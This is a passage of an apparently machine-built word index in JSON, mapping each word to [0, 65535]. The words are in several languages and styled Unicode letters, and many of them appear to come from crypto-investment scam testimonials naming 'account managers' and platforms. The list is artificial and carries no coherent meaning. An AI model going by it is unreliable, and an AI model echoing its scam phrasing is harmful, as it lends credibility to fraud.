"\u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445": [0, 65535], "\u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439": [0, 65535], "\u0434\u0430\u0436\u0435": [0, 65535], "\u0441": [0, 65535], "\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0447\u0438\u043a\u043e\u043c": [0, 65535], "\u0447\u0435\u043c": [0, 65535], "\u0431\u043e\u043b\u044c\u0448\u0435": [0, 65535], "\u0431\u0443\u0434\u0435\u0448\u044c": [0, 65535], "\u044f\u0437\u044b\u043a\u043e\u043c": [0, 65535], "\u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c": [0, 65535], "\u0442\u0435\u043c": [0, 65535], "\u0431\u0443\u0434\u0435\u0442": [0, 65535], "\u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u044f": [0, 65535], "\u0447\u0435\u0442": [0, 65535], "\u0433\u0434\u0435": [0, 65535], "\u0441\u043c\u043e\u0442\u0440\u0435\u043b": [0, 65535], "\u043f\u043e\u043c\u043e\u0439\u043c\u0443": [0, 65535], "\u0441\u0430\u043d\u044f": [0, 65535], "\u0432\u043e": [0, 65535], "\u0444\u043b\u043e\u0440\u0438\u0434\u0435": [0, 65535], "\u043a\u0430\u043d\u0430\u043b": [0, 65535], "\u043d\u0430\u043b\u043e\u0433\u043e\u0432\u0443\u044e": [0, 65535], "\u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c": [0, 65535], "\u0434\u043e\u0445\u043e\u0434\u044b": [0, 65535], "\u043e\u0442": [0, 65535], "\u043f\u0435\u0440\u0435\u043f\u0440\u043e\u0434\u0432": [0, 65535], "\u043a\u0435": [0, 65535], "\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e": [0, 65535], "\u043d\u0430\u0437\u0432\u0430\u0442\u044c": [0, 65535], "\u0432\u043e\u043e\u0431\u0449\u0435\u043c": [0, 65535], "\u043e\u043d": [0, 65535], "\u043f\u043e\u043a\u0443\u043f\u0430\u043b": [0, 65535], "\u043f\u043e": [0, 65535], "\u0434\u0435\u0448\u043c\u0430\u043d\u0443": [0, 65535], "\u0433\u0430\u0437\u043e\u043d\u043e": [0, 65535], "\u043a\u0430\u0441\u0438\u043b\u043a\u0438": [0, 65535], "\u043f\u0440\u043e\u0447\u0438\u0431": [0, 65535], "\u043c\u0435\u043b\u043a\u0443\u044e": [0, 65535], "\u0442\u0435\u0445\u043d\u0438\u043a\u0443": [0, 65535], "\u0441\u043b\u043e\u043c\u0430\u043d\u043d\u0443\u044e": [0, 65535], "\u0447\u0430": [0, 65535], "\u043d\u043d\u043e\u0433\u043e": [0, 65535], "\u0441\u0430\u043d\u0438": [0, 65535], "\u043e\u0431\u0440\u0430\u0442\u0438\u0442": [0, 65535], "\u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f": [0, 65535], "\u0430\u043c\u0435\u0440\u0438\u043a\u0438": [0, 65535], "\u044d\u0442\u0438\u043c": [0, 65535], "\u043f\u0438\u0441\u0435\u0446": [0, 65535], "\u0441\u0442\u0440\u043e\u0433\u043e": [0, 65535], "ears": [0, 65535], "mentorship": [0, 65535], "hasn": [0, 65535], "overwhelmed": [0, 65535], "\u043d\u0435\u0442": [0, 65535], "\u0438\u0437\u0432\u0438\u043d\u0438\u0442\u0435": [0, 65535], "\u0440\u0443\u0441\u0441\u043a\u0438\u0445": [0, 65535], "\u0442\u0443\u0442": [0, 65535], "\u043e\u0434\u043d\u0438": [0, 65535], "\u0445\u0430\u0447\u0438": [0, 65535], "mason": [0, 65535], "superuser": [0, 65535], "\u0437\u0430\u044e\u0437\u0430\u0435\u0448\u044c": [0, 65535], "\u043f\u0435\u0440\u0435\u0441\u044b\u043b\u043a\u0443": [0, 65535], "\u0432\u043d\u0435": [0, 65535], "\u0435\u0432\u0440\u043e\u0441\u043e\u044e\u0437\u0430": [0, 65535], "\u043c\u043e\u0436\u043d\u043e": [0, 65535], "\u043f\u043b\u0430\u0442\u0438\u0442\u044c": [0, 65535], "\u043d\u0434\u0441": [0, 65535], "\ud835\udc27\ud835\udc1e\ud835\udc2f\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc28\ud835\udc2e\ud835\udc20\ud835\udc21\ud835\udc2d": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc2e\ud835\udc25\ud835\udc1d": [0, 65535], "\ud835\udc1b\ud835\udc1e": [0, 65535], "\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc27\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc22\ud835\udc2c": [0, 65535], "\ud835\udc26\ud835\udc2e\ud835\udc1c\ud835\udc21": [0, 65535], "\ud835\udc22\ud835\udc27": [0, 65535], "\ud835\udc21\ud835\udc28\ud835\udc2e\ud835\udc2b\ud835\udc2c": [0, 65535], "\ud835\udc2d\ud835\udc2b\ud835\udc1a\ud835\udc1d\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc13\ud835\udc21\ud835\udc22\ud835\udc27\ud835\udc20\ud835\udc2c": [0, 65535], "\ud835\udc21\ud835\udc1a\ud835\udc2c": [0, 65535], "\ud835\udc1a\ud835\udc1c\ud835\udc2d\ud835\udc2e\ud835\udc1a\ud835\udc25\ud835\udc25\ud835\udc32": [0, 65535], "\ud835\udc1c\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc20\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc2c\ud835\udc22\ud835\udc27\ud835\udc1c\ud835\udc1e": [0, 65535], "\ud835\udc2c\ud835\udc2d\ud835\udc1a\ud835\udc2b\ud835\udc2d\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2f\ud835\udc1e": [0, 65535], "withdrawals": [0, 65535], "spread": [0, 65535], "jzf": [0, 65535], "zowi": [0, 65535], "\ud835\udc84\ud835\udc82\ud835\udc8f": [0, 65535], "\ud835\udc95": [0, 65535], "\ud835\udc88\ud835\udc8a\ud835\udc97\ud835\udc86": [0, 65535], "\ud835\udc96\ud835\udc91": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc84\ud835\udc82\ud835\udc96\ud835\udc94\ud835\udc86": [0, 65535], "\ud835\udc8f\ud835\udc90": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc8d\ud835\udc8a\ud835\udc86\ud835\udc97\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc98\ud835\udc89\ud835\udc82\ud835\udc95": [0, 65535], "\ud835\udc9a\ud835\udc90\ud835\udc96": [0, 65535], "\ud835\udc85\ud835\udc90": [0, 65535], "\ud835\udc7b\ud835\udc89\ud835\udc86": [0, 65535], "\ud835\udc91\ud835\udc86\ud835\udc93\ud835\udc94\ud835\udc90\ud835\udc8f": [0, 65535], "\ud835\udc98\ud835\udc89\ud835\udc90": [0, 65535], "\ud835\udc94\ud835\udc89\ud835\udc90\ud835\udc96\ud835\udc8d\ud835\udc85": [0, 65535], "\ud835\udc89\ud835\udc82\ud835\udc97\ud835\udc86": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc86": [0, 65535], "\ud835\udc96\ud835\udc95\ud835\udc8e\ud835\udc90\ud835\udc94\ud835\udc95": [0, 65535], "\ud835\udc8a\ud835\udc94": [0, 65535], "\ud835\udc95\ud835\udc90\ud835\udc85\ud835\udc82\ud835\udc9a": [0, 65535], "\ud835\udc82\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc90\ud835\udc87": [0, 65535], "\ud835\udc89\ud835\udc86\ud835\udc8d\ud835\udc91": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc8a\ud835\udc94": [0, 65535], "\ud835\udc98\ud835\udc90\ud835\udc8f\ud835\udc85\ud835\udc86\ud835\udc93\ud835\udc87\ud835\udc96\ud835\udc8d": [0, 65535], "cxyj": [0, 65535], "zdywmdk": [0, 65535], "qiauzxxyf": [0, 65535], "responsibly": [0, 65535], "morrison": [0, 65535], "gsi": [0, 65535], "efzvu": [0, 65535], "wnznk": [0, 65535], "\ud835\udc8d\ud835\udc90\ud835\udc94\ud835\udc95": [0, 65535], "\ud835\udc8b\ud835\udc90\ud835\udc83": [0, 65535], "\ud835\udc8a\ud835\udc8e\ud835\udc8e\ud835\udc86\ud835\udc85\ud835\udc8a\ud835\udc82\ud835\udc95\ud835\udc86\ud835\udc8d\ud835\udc9a": [0, 65535], "\ud835\udc8d\ud835\udc90\ud835\udc84\ud835\udc8c": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc98\ud835\udc8f": [0, 65535], "\ud835\udc98\ud835\udc82\ud835\udc94": [0, 65535], "\ud835\udc94\ud835\udc90": [0, 65535], "\ud835\udc85\ud835\udc86\ud835\udc97\ud835\udc82\ud835\udc94\ud835\udc95\ud835\udc82\ud835\udc95\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8f\ud835\udc87\ud835\udc96\ud835\udc94\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc94\ud835\udc82\ud835\udc8e\ud835\udc86": [0, 65535], "\ud835\udc89\ud835\udc86\ud835\udc82\ud835\udc93\ud835\udc85": [0, 65535], "\ud835\udc82\ud835\udc83\ud835\udc90\ud835\udc96\ud835\udc95": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc97\ud835\udc86\ud835\udc94\ud835\udc95\ud835\udc8e\ud835\udc86\ud835\udc8f\ud835\udc95": [0, 65535], "\ud835\udc91\ud835\udc8d\ud835\udc82\ud835\udc95\ud835\udc87\ud835\udc90\ud835\udc93\ud835\udc8e": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc97\ud835\udc86\ud835\udc94\ud835\udc95\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc8d\ud835\udc8a\ud835\udc95\ud835\udc95\ud835\udc8d\ud835\udc86": [0, 65535], "\ud835\udc94\ud835\udc82\ud835\udc97\ud835\udc8a\ud835\udc8f\ud835\udc88\ud835\udc94": [0, 65535], "\ud835\udc89\ud835\udc82\ud835\udc85": [0, 65535], "\ud835\udc86\ud835\udc97\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc94\ud835\udc8a\ud835\udc8f\ud835\udc84\ud835\udc86": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc86\ud835\udc8f": [0, 65535], "\ud835\udc8e\ud835\udc90\ud835\udc8f\ud835\udc86\ud835\udc9a": [0, 65535], "\ud835\udc98\ud835\udc90\ud835\udc93\ud835\udc8c\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc8a\ud835\udc95'\ud835\udc94": [0, 65535], "\ud835\udc82\ud835\udc8e\ud835\udc82\ud835\udc9b\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "qbwzohy": [0, 65535], "znji": [0, 65535], "believing": [0, 65535], "michaelnolan": [0, 65535], "bukh": [0, 65535], "exn": [0, 65535], "positively": [0, 65535], "sincere": [0, 65535], "dqzx": [0, 65535], "sssy": [0, 65535], "\ud835\ude68\ud835\ude64": [0, 65535], "\ud835\ude44'\ud835\ude61\ud835\ude61": [0, 65535], "\ud835\ude61\ud835\ude5e\ud835\ude68\ud835\ude69": [0, 65535], "\ud835\ude64\ud835\ude6a\ud835\ude69": [0, 65535], "\ud835\ude5b\ud835\ude5a\ud835\ude6c": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude5e\ud835\ude63\ud835\ude5c\ud835\ude68": [0, 65535], "\ud835\ude65\ud835\ude61\ud835\ude56\ud835\ude69\ud835\ude5b\ud835\ude64\ud835\ude67\ud835\ude62": [0, 65535], "\ud835\ude5d\ud835\ude5a\ud835\ude61\ud835\ude65\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude56\ud835\ude58\ud835\ude5d\ud835\ude5e\ud835\ude5a\ud835\ude6b\ud835\ude5a": [0, 65535], "\ud835\ude5b\ud835\ude64\ud835\ude67": [0, 65535], "\ud835\ude62\ud835\ude64\ud835\ude69\ud835\ude5d\ud835\ude5a\ud835\ude67'\ud835\ude68": [0, 65535], "\ud835\ude5d\ud835\ude64\ud835\ude68\ud835\ude65\ud835\ude5e\ud835\ude69\ud835\ude56\ud835\ude61": [0, 65535], "\ud835\ude57\ud835\ude5e\ud835\ude61\ud835\ude61": [0, 65535], "\ud835\ude58\ud835\ude61\ud835\ude5a\ud835\ude56\ud835\ude67\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude59\ud835\ude5a\ud835\ude57\ud835\ude69": [0, 65535], "\ud835\ude5d\ud835\ude5a\ud835\ude61\ud835\ude65": [0, 65535], "\ud835\ude68\ud835\ude69\ud835\ude56\ud835\ude67\ud835\ude69": [0, 65535], "\ud835\ude6a\ud835\ude65": [0, 65535], "\ud835\ude57\ud835\ude6a\ud835\ude68\ud835\ude5e\ud835\ude63\ud835\ude5a\ud835\ude68\ud835\ude68": [0, 65535], "\ud835\ude56\ud835\ude67\ud835\ude5a": [0, 65535], "\ud835\ude62\ud835\ude56\ud835\ude60\ud835\ude5e\ud835\ude63\ud835\ude5c": [0, 65535], "\ud835\ude65\ud835\ude67\ud835\ude64\ud835\ude5b\ud835\ude5e\ud835\ude69\ud835\ude68": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude67\ud835\ude64\ud835\ude6a\ud835\ude5c\ud835\ude5d": [0, 65535], "\ud835\ude57\ud835\ude5e\ud835\ude69\ud835\ude58\ud835\ude64\ud835\ude5e\ud835\ude63": [0, 65535], "\ud835\ude57\ud835\ude5a": [0, 65535], "\ud835\ude65\ud835\ude56\ud835\ude67\ud835\ude69": [0, 65535], "\ud835\ude64\ud835\ude5b": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude64\ud835\ude68\ud835\ude5a": [0, 65535], "todfeqeshss": [0, 65535], "ntu": [0, 65535], "cornelius": [0, 65535], "muono": [0, 65535], "owi": [0, 65535], "awqcawqmmdhhhttpgwt": [0, 65535], "uawqmmxodhh": [0, 65535], "tardefx": [0, 65535], "\ud835\udc03\ud835\udc28\ud835\udc27'\ud835\udc2d": [0, 65535], "\ud835\udc2c\ud835\udc2d\ud835\udc1a\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc1b\ud835\udc32": [0, 65535], "\ud835\udc2c\ud835\udc22\ud835\udc1d\ud835\udc1e\ud835\udc25\ud835\udc22\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc30\ud835\udc21\ud835\udc22\ud835\udc25\ud835\udc1e": [0, 65535], "\ud835\udc28\ud835\udc2d\ud835\udc21\ud835\udc1e\ud835\udc2b\ud835\udc2c": [0, 65535], "\ud835\udc1a\ud835\udc2b\ud835\udc1e": [0, 65535], "\ud835\udc1a": [0, 65535], "\ud835\udc29\ud835\udc1a\ud835\udc2b\ud835\udc2d": [0, 65535], "\ud835\udc2d\ud835\udc1e\ud835\udc1a\ud835\udc26": [0, 65535], "\ud835\udc1e\ud835\udc27\ud835\udc23\ud835\udc28\ud835\udc32\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc27\ud835\udc1e\ud835\udc1f\ud835\udc22\ud835\udc2d\ud835\udc2c": [0, 65535], "\ud835\udc22\ud835\udc2d'\ud835\udc2c": [0, 65535], "\ud835\udc2d\ud835\udc22\ud835\udc26\ud835\udc1e": [0, 65535], "\ud835\udc1f\ud835\udc28\ud835\udc2b": [0, 65535], "\ud835\udc1e\ud835\udc27\ud835\udc23\ud835\udc28\ud835\udc32": [0, 65535], "\ud835\udc2d\ud835\udc28\ud835\udc28": [0, 65535], "vkhiwj": [0, 65535], "utwa": [0, 65535], "optionfx": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc2e\ud835\udc2b\ud835\udc1a\ud835\udc20\ud835\udc1e\ud835\udc28\ud835\udc2e\ud835\udc2c": [0, 65535], "\ud835\udc30\ud835\udc21\ud835\udc1a\ud835\udc2d\ud835\udc1e\ud835\udc2f\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc1d\ud835\udc28": [0, 65535], "\ud835\udc22\ud835\udc1f": [0, 65535], "\ud835\udc21\ud835\udc1a\ud835\udc1d": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc2e\ud835\udc2b\ud835\udc1a\ud835\udc20\ud835\udc1e": [0, 65535], "\ud835\udc27\ud835\udc28\ud835\udc30": [0, 65535], "\ud835\udc30\ud835\udc28\ud835\udc2e\ud835\udc25\ud835\udc1d": [0, 65535], "\ud835\udc20\ud835\udc28\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc25\ud835\udc28\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc30\ud835\udc1a\ud835\udc32": [0, 65535], "\ud835\udc1e\ud835\udc2f\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2f\ud835\udc1e\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc29\ud835\udc25\ud835\udc1a\ud835\udc2d\ud835\udc1f\ud835\udc28\ud835\udc2b\ud835\udc26": [0, 65535], "\ud835\udc2d\ud835\udc1e\ud835\udc25\ud835\udc25": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc22\ud835\udc27\ud835\udc20\ud835\udc2c": [0, 65535], "\ud835\udc1c\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc20\ud835\udc1e": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc2d\ud835\udc2d\ud835\udc1e\ud835\udc2b": [0, 65535], "lc": [0, 65535], "qgywytrk": [0, 65535], "uawqkmmxodhh": [0, 65535], "doubted": [0, 65535], "regrets": [0, 65535], "smiles": [0, 65535], "mf": [0, 65535], "drug": [0, 65535], "dealers": [0, 65535], "mothers": [0, 65535], "inbred": [0, 65535], "surakshit": [0, 65535], "bahut": [0, 65535], "vishvasaneey": [0, 65535], "pariyojana": [0, 65535], "adhik": [0, 65535], "laabh": [0, 65535], "ritarn": [0, 65535], "suvrettacapitalproject": [0, 65535], "morris": [0, 65535], "kent": [0, 65535], "scammed": [0, 65535], "discouraged": [0, 65535], "tamx": [0, 65535], "fioizngi": [0, 65535], "quarantined": [0, 65535], "promised": [0, 65535], "benefiting": [0, 65535], "awqcawbmmdhhhttpgwt": [0, 65535], "uammtmxodhh": [0, 65535], "faithful": [0, 65535], "spreading": [0, 65535], "massages": [0, 65535], "venmo": [0, 65535], "jzmcdfwemmb": [0, 65535], "payp": [0, 65535], "awqcawbmmdhhhttpgwtammtmxodhh": [0, 65535], "oknszowm": [0, 65535], "celebration": [0, 65535], "cyvvc": [0, 65535], "iadlzwi": [0, 65535], "sqrmlcg": [0, 65535], "ndc": [0, 65535], "allaire": [0, 65535], "accuracy": [0, 65535], "reflection": [0, 65535], "grateful": [0, 65535], "rejoicing": [0, 65535], "ebhzzvckjlowyx": [0, 65535], "thanking": [0, 65535], "noah": [0, 65535], "nelson": [0, 65535], "kenneth": [0, 65535], "copeland": [0, 65535], "blake": [0, 65535], "elfgi": [0, 65535], "qasqyymdi": [0, 65535], "stuckmarket": [0, 65535], "wilbur": [0, 65535], "awqcawbmmdhhhttpghhawbmmdhhhttp": [0, 65535], "\ud835\udc1a\ud835\udc26": [0, 65535], "\ud835\udc2f\ud835\udc1e\ud835\udc2b\ud835\udc32": [0, 65535], "\ud835\udc26\ud835\udc1a\ud835\udc1d\ud835\udc1e": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc2b\ud835\udc28\ud835\udc2e\ud835\udc20\ud835\udc21": [0, 65535], "\ud835\udc1f\ud835\udc28\ud835\udc2b\ud835\udc1e\ud835\udc31": [0, 65535], "\ud835\udc21\ud835\udc1e\ud835\udc25\ud835\udc29": [0, 65535], "\ud835\udc0d\ud835\udc28\ud835\udc1a\ud835\udc21": [0, 65535], "\ud835\udc0d\ud835\udc1e\ud835\udc25\ud835\udc2c\ud835\udc28\ud835\udc27": [0, 65535], "\ud835\udc25\ud835\udc1e\ud835\udc20\ud835\udc22\ud835\udc2d": [0, 65535], "\ud835\udc1a\ud835\udc1c\ud835\udc1c\ud835\udc28\ud835\udc2e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc26\ud835\udc1a\ud835\udc27\ud835\udc1a\ud835\udc20\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc30\ud835\udc21\ud835\udc28": [0, 65535], "\ud835\udc21\ud835\udc2e\ud835\udc20\ud835\udc1e": [0, 65535], "\ud835\udc1d\ud835\udc22\ud835\udc1f\ud835\udc1f\ud835\udc1e\ud835\udc2b\ud835\udc1e\ud835\udc27\ud835\udc1c\ud835\udc1e": [0, 65535], "\ud835\udc26\ud835\udc32": [0, 65535], "\ud835\udc25\ud835\udc22\ud835\udc1f\ud835\udc1e": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2f\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc1c\ud835\udc1e\ud835\udc22\ud835\udc2f\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc27\ud835\udc28\ud835\udc2d": [0, 65535], "\ud835\udc25\ud835\udc1e\ud835\udc2c\ud835\udc2c": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1a\ud835\udc27": [0, 65535], "\ud835\udc2c\ud835\udc2d\ud835\udc22\ud835\udc25\ud835\udc25": [0, 65535], "\ud835\udc1d\ud835\udc28\ud835\udc27'\ud835\udc2d": [0, 65535], "\ud835\udc24\ud835\udc27\ud835\udc28\ud835\udc30": [0, 65535], "\ud835\udc21\ud835\udc28\ud835\udc30": [0, 65535], "\ud835\udc21\ud835\udc1e": [0, 65535], "\ud835\udc1d\ud835\udc28\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc22\ud835\udc2d": [0, 65535], "\ud835\udc02\ud835\udc28\ud835\udc27\ud835\udc2d\ud835\udc1a\ud835\udc1c\ud835\udc2d": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2d\ud835\udc1e\ud835\udc2b\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc1f\ud835\udc28\ud835\udc2b\ud835\udc26\ud835\udc1a\ud835\udc2d\ud835\udc22\ud835\udc28\ud835\udc27": [0, 65535], "\ud835\udc28\ud835\udc27": [0, 65535], "\ud835\udc20\ud835\udc1e\ud835\udc2d": [0, 65535], "gifts": [0, 65535], "dlscold": [0, 65535], "newyear": [0, 65535], "lywwuqlv": [0, 65535], "uhkmzlk": [0, 65535], "waters": [0, 65535], "transparency": [0, 65535], "accountability": [0, 65535], "undeniable": [0, 65535], "transactions": [0, 65535], "bonanza": [0, 65535], "withdraw": [0, 65535], "assurance": [0, 65535], "doubled": [0, 65535], "\ud835\ude52\ud835\ude5d\ud835\ude5a\ud835\ude63": [0, 65535], "\ud835\ude61\ud835\ude64\ud835\ude68\ud835\ude69": [0, 65535], "\ud835\ude5f\ud835\ude64\ud835\ude57": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude64\ud835\ude6a\ud835\ude5c\ud835\ude5d\ud835\ude69": [0, 65535], "\ud835\ude44'\ud835\ude6b\ud835\ude5a": [0, 65535], "\ud835\ude5e\ud835\ude69": [0, 65535], "\ud835\ude52\ud835\ude5e\ud835\ude69\ud835\ude5d": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude5a": [0, 65535], "\ud835\ude61\ud835\ude5e\ud835\ude69\ud835\ude69\ud835\ude61\ud835\ude5a": [0, 65535], "\ud835\ude58\ud835\ude56\ud835\ude68\ud835\ude5d": [0, 65535], "\ud835\ude69\ud835\ude6a\ud835\ude67\ud835\ude63\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude5e\ud835\ude63\ud835\ude69\ud835\ude64": [0, 65535], "\ud835\ude5e\ud835\ude63": [0, 65535], "\ud835\ude5f\ud835\ude6a\ud835\ude68\ud835\ude69": [0, 65535], "\ud835\uddf5\ud835\uddfc\ud835\ude02\ud835\uddff\ud835\ude00": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude5a\ud835\ude6e": [0, 65535], "\ud835\ude62\ud835\ude56\ud835\ude6e": [0, 65535], "\ud835\ude63\ud835\ude64\ud835\ude69": [0, 65535], "\ud835\ude60\ud835\ude63\ud835\ude64\ud835\ude6c": [0, 65535], "\ud835\ude57\ud835\ude6a\ud835\ude69": [0, 65535], "\ud835\ude5d\ud835\ude5a": [0, 65535], "\ud835\ude67\ud835\ude5a\ud835\ude56\ud835\ude61\ud835\ude61\ud835\ude6e": [0, 65535], "\ud835\ude58\ud835\ude5d\ud835\ude56\ud835\ude63ge": [0, 65535], "privileged": [0, 65535], "supportive": [0, 65535], "charlesbrandon": [0, 65535], "fabrizio": [0, 65535], "pk": [0, 65535], "ph": [0, 65535], "ewzzjlk": [0, 65535], "mary": [0, 65535], "undying": [0, 65535], "kqo": [0, 65535], "rrjz": [0, 65535], "andrewfx": [0, 65535], "yzbk": [0, 65535], "believed": [0, 65535], "\ud835\uddc2f": [0, 65535], "\ud835\uddbc\ud835\uddc8\ud835\uddce\ud835\uddc5\ud835\uddbd": [0, 65535], "\ud835\uddc6\ud835\uddba\ud835\uddc4\ud835\uddbe": [0, 65535], "\ud835\uddba": [0, 65535], "\ud835\uddc1\ud835\uddce\ud835\uddc0\ud835\uddbe": [0, 65535], "\ud835\uddba\ud835\uddc6\ud835\uddc8\ud835\uddce\ud835\uddc7\ud835\uddcd": [0, 65535], "\ud835\uddc6\ud835\uddc8\ud835\uddc7\ud835\uddbe\ud835\uddd2": [0, 65535], "\ud835\uddd0\ud835\uddbe\ud835\uddbe\ud835\uddc4\ud835\uddc5\ud835\uddd2": [0, 65535], "\ud835\uddbf\ud835\uddcb\ud835\uddc8\ud835\uddc6": [0, 65535], "\ud835\uddbb\ud835\uddc2\ud835\uddcd\ud835\uddbc\ud835\uddc8\ud835\uddc2\ud835\uddc7": [0, 65535], "\ud835\uddcd\ud835\uddcb\ud835\uddba\ud835\uddbd\ud835\uddc2\ud835\uddc7\ud835\uddc0": [0, 65535], "\ud835\uddcd\ud835\uddc1\ud835\uddc2\ud835\uddc7\ud835\uddc0\ud835\uddcc": [0, 65535], "\ud835\uddc1\ud835\uddba\ud835\uddbd": [0, 65535], "\ud835\uddbc\ud835\uddc1\ud835\uddba\ud835\uddc7\ud835\uddc0\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddcc\ud835\uddc2\ud835\uddc7\ud835\uddbc\ud835\uddbe": [0, 65535], "\ud835\uddc2": [0, 65535], "\ud835\uddcc\ud835\uddcd\ud835\uddba\ud835\uddcb\ud835\uddcd\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1": [0, 65535], "tradertyler": [0, 65535], "\ud835\uddc2\ud835\uddc7\ud835\uddcf\ud835\uddbe\ud835\uddcc\ud835\uddcd\ud835\uddc2\ud835\uddc7\ud835\uddc0": [0, 65535], "\ud835\uddc0\ud835\uddbe\ud835\uddcd\ud835\uddcd\ud835\uddc2\ud835\uddc7\ud835\uddc0": [0, 65535], "\ud835\uddd0\ud835\uddba\ud835\uddcc": [0, 65535], "\ud835\uddcc\ud835\uddc8\ud835\uddc6\ud835\uddbe\ud835\uddcd\ud835\uddc1\ud835\uddc2\ud835\uddc7\ud835\uddc0": [0, 65535], "\ud835\uddc7\ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb": [0, 65535], "\ud835\uddbe\ud835\uddd1\ud835\uddc9\ud835\uddbe\ud835\uddbc\ud835\uddcd\ud835\uddbe\ud835\uddbd": [0, 65535], "fortune": [0, 65535], "eemv": [0, 65535], "pdkrorlntfk": [0, 65535], "cryptotards": [0, 65535], "recruiting": [0, 65535], "aimed": [0, 65535], "asbevw": [0, 65535], "dlhm": [0, 65535], "privilege": [0, 65535], "michaelnolanfx": [0, 65535], "dmmq": [0, 65535], "bhdkgk": [0, 65535], "ntg": [0, 65535], "stevenfx": [0, 65535], "courage": [0, 65535], "shearing": [0, 65535], "igrmphzrhqdkzwe": [0, 65535], "roam": [0, 65535], "localhost": [0, 65535], "discqrdapp": [0, 65535], "astineden": [0, 65535], "rqhp": [0, 65535], "ytwdqdhzddk": [0, 65535], "oni": [0, 65535], "posielaj\u00fa": [0, 65535], "skorej": [0, 65535], "e\u0161te": [0, 65535], "predt\u00fdm": [0, 65535], "ako": [0, 65535], "pr\u00edde": [0, 65535], "krajiny": [0, 65535], "discbrdapp": [0, 65535], "\ud835\udc80\ud835\udc90\ud835\udc96": [0, 65535], "\ud835\udc84\ud835\udc89\ud835\udc82\ud835\udc8f\ud835\udc88\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc8d\ud835\udc8a\ud835\udc87\ud835\udc86": [0, 65535], "\ud835\udc8e\ud835\udc82\ud835\udc85\ud835\udc86": [0, 65535], "\ud835\udc89\ud835\udc82\ud835\udc91\ud835\udc91\ud835\udc9a": [0, 65535], "\ud835\udc90\ud835\udc8f\ud835\udc84\ud835\udc86": [0, 65535], "\ud835\udc82\ud835\udc88\ud835\udc82\ud835\udc8a\ud835\udc8f": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc8f'\ud835\udc95": [0, 65535], 